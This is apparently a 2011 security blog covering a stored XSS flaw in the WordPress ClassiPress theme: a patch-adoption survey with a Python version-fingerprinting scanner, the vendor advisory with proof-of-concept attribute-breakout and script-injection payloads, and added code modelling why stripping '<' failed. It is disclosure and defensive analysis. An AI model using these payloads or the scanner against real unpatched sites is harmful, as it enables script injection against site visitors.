Although the bug has been patched and an advisory released for it, I also took the time to do some informal research to gauge the scope of last month's XSS vulnerability.
I started scanning six weeks after the patch release, so it is probably safe to say the results are representative of those sites whose owners will patch at all. Because of the continuing changes in the Google web API, I chose Bing over Google as my search engine. After searching and using a couple of techniques to increase the number of results, I ended up with a list of 1110 different sites running the theme. These were scanned and fingerprinted. Of the 926 systems running standard configurations, here is the version breakdown.
Version - Systems:
2.0.5 - 4
2.9.3 - 1
3.0.1 - 12
3.0.2 - 123
3.0.3 - 10
3.0.4 - 55
3.0.5.1 - 26
3.0.5.2 - 23
3.0.5.3 - 120
3.0.5.4 - 145
3.1 - 406
3.1.2 - 9
3.1.3 - 77
3.1.4 - 162
3.1.5 - 129
No statistical model fit the data, but one fact is obvious: patch rates for old versions do not look good. Over two-thirds of the systems running ClassiPress are still vulnerable.
While looking up a list of version numbers on the AppThemes website I found a nice surprise: AppThemes explains that version 3.1.5 (which contains the patch) also added an auto-updater behind the scenes. Manually copying patch files tends to intimidate the non-technical audience that products like WordPress attract, so companies that pay attention to their customers' needs are appreciated. Thanks, guys!
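The fingerprinting and tallying described above, as an added example that is not the author's scanning code (the post says that will be published separately) and not AppThemes code. It assumes the theme lives at WordPress' default theme path and that the version is read from the standard `Version:` header in the theme's `style.css`; the hostnames and responses are constructed for the example, and the network fetcher is only a default that the sample run swaps out. Versions are compared as integer tuples, because string comparison gets multi-part versions wrong.

```python
import re
import urllib.request
from collections import Counter
from typing import Callable, Dict, Iterable, Optional, Tuple

# First version carrying the fix, per the advisory timeline on this page.
FIXED_VERSION = "3.1.5"

# Assumption: the theme sits in WordPress' default theme directory under its own
# name. Sites that rename the directory are the "non-standard configurations"
# the post sets aside and would need a different path (or a content-based check).
THEME_STYLE_PATH = "/wp-content/themes/classipress/style.css"

# WordPress theme headers live in a comment block at the top of style.css.
THEME_NAME_RE = re.compile(r"^\s*Theme Name:\s*(.+?)\s*$", re.IGNORECASE | re.MULTILINE)
VERSION_RE = re.compile(r"^\s*Version:\s*(\d+(?:\.\d+)*)\s*$", re.IGNORECASE | re.MULTILINE)


def parse_version(text: str) -> Tuple[int, ...]:
    """'3.0.5.4' -> (3, 0, 5, 4). Tuples compare numerically; strings do not
    ('3.10' < '3.9' as strings, which would misclassify a future release)."""
    return tuple(int(part) for part in text.strip().split("."))


def is_vulnerable(version: str) -> bool:
    """Everything below the patched release (i.e. <= 3.1.4) is affected."""
    return parse_version(version) < parse_version(FIXED_VERSION)


def fingerprint(style_css: str) -> Optional[str]:
    """Return the version declared in a ClassiPress style.css header, else None."""
    name = THEME_NAME_RE.search(style_css)
    if not name or "classipress" not in name.group(1).lower():
        return None
    version = VERSION_RE.search(style_css)
    return version.group(1) if version else None


def http_get(url: str, timeout: float = 10.0) -> Optional[str]:
    """Fetch a URL, returning None on any network or HTTP error."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read(64 * 1024).decode("utf-8", "replace")
    except Exception:
        return None


def scan(sites: Iterable[str],
         fetch: Callable[[str], Optional[str]] = http_get) -> Dict[str, str]:
    """Map each site that fingerprints as ClassiPress to its version string."""
    found: Dict[str, str] = {}
    for site in sites:
        body = fetch(site.rstrip("/") + THEME_STYLE_PATH)
        version = fingerprint(body) if body else None
        if version:
            found[site] = version
    return found


def summarise(versions: Iterable[str]) -> Dict[str, object]:
    """Version breakdown plus the share still below the patched release."""
    counts = Counter(versions)
    total = sum(counts.values())
    vulnerable = sum(n for v, n in counts.items() if is_vulnerable(v))
    return {
        "by_version": dict(sorted(counts.items(), key=lambda kv: parse_version(kv[0]))),
        "total": total,
        "vulnerable": vulnerable,
        "vulnerable_fraction": (vulnerable / total) if total else 0.0,
    }


# Constructed sample responses standing in for fetched style.css files; the
# hostnames and contents are made up for this example.
SAMPLE_RESPONSES = {
    "http://one.example" + THEME_STYLE_PATH: "/*\nTheme Name: ClassiPress\nVersion: 3.0.5.4\n*/\n",
    "http://two.example" + THEME_STYLE_PATH: "/*\nTheme Name: ClassiPress\nVersion: 3.1.5\n*/\n",
    "http://three.example" + THEME_STYLE_PATH: "/*\nTheme Name: ClassiPress\nVersion: 3.1\n*/\n",
    "http://four.example" + THEME_STYLE_PATH: "/*\nTheme Name: Twenty Ten\nVersion: 1.2\n*/\n",
    # "http://five.example" has no entry, which stands in for a 404 (fetch returns None)
}


def fake_fetch(url: str) -> Optional[str]:
    return SAMPLE_RESPONSES.get(url)


if __name__ == "__main__":
    sites = ["http://one.example", "http://two.example", "http://three.example",
             "http://four.example", "http://five.example"]
    results = scan(sites, fetch=fake_fetch)
    print(results)
    print(summarise(results.values()))
```

The injectable `fetch` keeps the classification logic testable offline; pointing `scan` at real hosts only needs the default fetcher, a rate limit and permission to test the sites in question.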
Saturday, December 3, 2011
Monday, October 31, 2011
Classipress Multiple Stored XSS
Note: Here is an explanation I recently submitted to the vendor and later to Offensive Security's Exploit-DB. The patch is at http://docs.appthemes.com/classipress/classipress-version-3-1-5/. I plan on posting scanning code sometime this week, and a synopsis of payload activation options in the near future.
Regards,
Paul
Shout-outs: DC 501, snide, Firmwarez, xalg
# Exploit Title: WordPress Classipress Theme <= 3.1.4 Stored XSS
# Date: 2011-09-26
# Author: Paul Loftness
# Contact: http://attackvectorlabs.blogspot.com
# Vendor: AppThemes LLC.
# Product Web Page: http://www.appthemes.com/themes/classipress/
# Version: <=3.1.4
# Tested Versions: 3.1.4, 3.0.5.3
Summary:
-------------------------
ClassiPress is a popular and widely used classified ads software for WordPress.
Description:
-------------------------
ClassiPress is vulnerable to multiple stored XSS vulnerabilities. Input passed through the POST parameters 'facebook_id' and 'twitter_id' on a registered user's profile page is either not sanitised or poorly sanitised (depending on version), allowing an attacker to insert JavaScript code that is stored and later rendered on the attacker's public author page.
In version 3.0.5.2, and presumably all previous versions, no sanitisation is in place, allowing an attacker to insert code within a tag or to break out of it. In version 3.1.4 the less-than character is sanitised, but an attacker can still insert quotes and place an event handler inside the tag.
Proof-of-Concept Code:
-------------------------
Insertion page: http://example_site/author/profile/
Infected page : http://example_site/author/attacker_username/
Note: Some sites replace "author" with another path; this is not a vanilla configuration, however.
Version: ClassiPress 3.0.5.2
Vulnerable Input Parameters:
twitter_id: " onmouseover="alert('XSS');
facebook_id: " onmouseover="alert('XSS');
Alternate Exploit code:
twitter_id: "><script>alert('XSS');</script><div id="
facebook_id: "><script>alert('XSS');</script><div id="
Version: ClassiPress 3.1.4
Vulnerable Input Parameters:
twitter_id: " onmouseover='alert("XSS");'><
facebook_id: " onmouseover='alert("XSS");'><
Timeline:
-------------------------
Vulnerability Discovered: 8/10/2011
Vulnerability Reported to Vendor: 9/1/2011
Patch Released with version 3.1.5: 10/7/2011
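The version-specific behaviour described in the advisory, as an added example that is not part of the advisory and not ClassiPress' own template code. Three stand-in renderers model (a) no filtering, (b) removing only the less-than character, which is how the advisory describes 3.1.4, and (c) escaping for the HTML-attribute context, quotes included. An HTML parser then checks whether each proof-of-concept payload above ends up as a script tag or an `on*` attribute, i.e. as something a browser would execute. The `href` sink, the hostname and the renderer functions are assumptions for illustration.

```python
import html
from html.parser import HTMLParser
from typing import Dict, List, Tuple

# Constructed sample inputs: the payloads from the advisory above plus one benign value.
PAYLOADS = {
    "attr_breakout": "\" onmouseover=\"alert('XSS');",
    "tag_injection": "\"><script>alert('XSS');</script><div id=\"",
    "event_handler": "\" onmouseover='alert(\"XSS\");'><",
    "benign": "paulloftness",
}

# Assumption: the profile value is interpolated into a double-quoted href on the
# public author page. The renderers model the behaviours the advisory describes;
# they are illustrative, not ClassiPress' actual code.

def render_unfiltered(twitter_id: str) -> str:
    """Pre-3.1 behaviour as described above: value dropped straight into the attribute."""
    return f'<a href="http://twitter.com/{twitter_id}">Twitter</a>'


def render_strip_lt(twitter_id: str) -> str:
    """3.1.4-style fix as described above (modelled as removing '<' only)."""
    return f'<a href="http://twitter.com/{twitter_id.replace("<", "")}">Twitter</a>'


def render_escaped(twitter_id: str) -> str:
    """Hardened form: escape for the HTML-attribute context, quotes included."""
    return f'<a href="http://twitter.com/{html.escape(twitter_id, quote=True)}">Twitter</a>'


class _TagCollector(HTMLParser):
    """Records every start tag and its attributes, as a browser's parser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: List[Tuple[str, Dict[str, str]]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, {name: (value or "") for name, value in attrs}))


def injected_js(rendered: str) -> bool:
    """True if the markup contains a script tag or an on* event-handler attribute."""
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    for tag, attrs in parser.tags:
        if tag == "script" or any(name.startswith("on") for name in attrs):
            return True
    return False


RENDERERS = {
    "unfiltered": render_unfiltered,
    "strip_lt": render_strip_lt,
    "escaped": render_escaped,
}


def audit() -> Dict[str, Dict[str, bool]]:
    """Which payloads yield executable JavaScript under each renderer."""
    return {
        rname: {pname: injected_js(render(payload)) for pname, payload in PAYLOADS.items()}
        for rname, render in RENDERERS.items()
    }


if __name__ == "__main__":
    for rname, row in audit().items():
        print(f"{rname:11s}", {p: ("XSS" if hit else "ok") for p, hit in row.items()})
```

Stripping `<` only defends against tag injection, which is an element-context concern; the sink here is an attribute value, where the closing quote is the character that matters, and that is exactly what the 3.1.4 payload uses. Escaping for the context the value lands in closes both routes at once.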
Sunday, September 25, 2011
Beginnings...
Hello,
Over the past several years, as an educational exercise, I have taken apart a number of pieces of software. Much of the specialized security research I do in my spare time merely occupies space on my hard drive. At the urging of some friends, I have decided to try to share some of this knowledge with the community. In this blog, I hope to...
1) Contribute a hobbyist's perspective on the IT industry, with a focus on security.
2) Provide more in-depth explanation and analysis for bugs posted on Exploit-DB, Bugtraq, etc.
3) Accrue a varied readership from a variety of backgrounds. This will hopefully help provide a varied viewpoint on the topic of security.
Comments are welcome.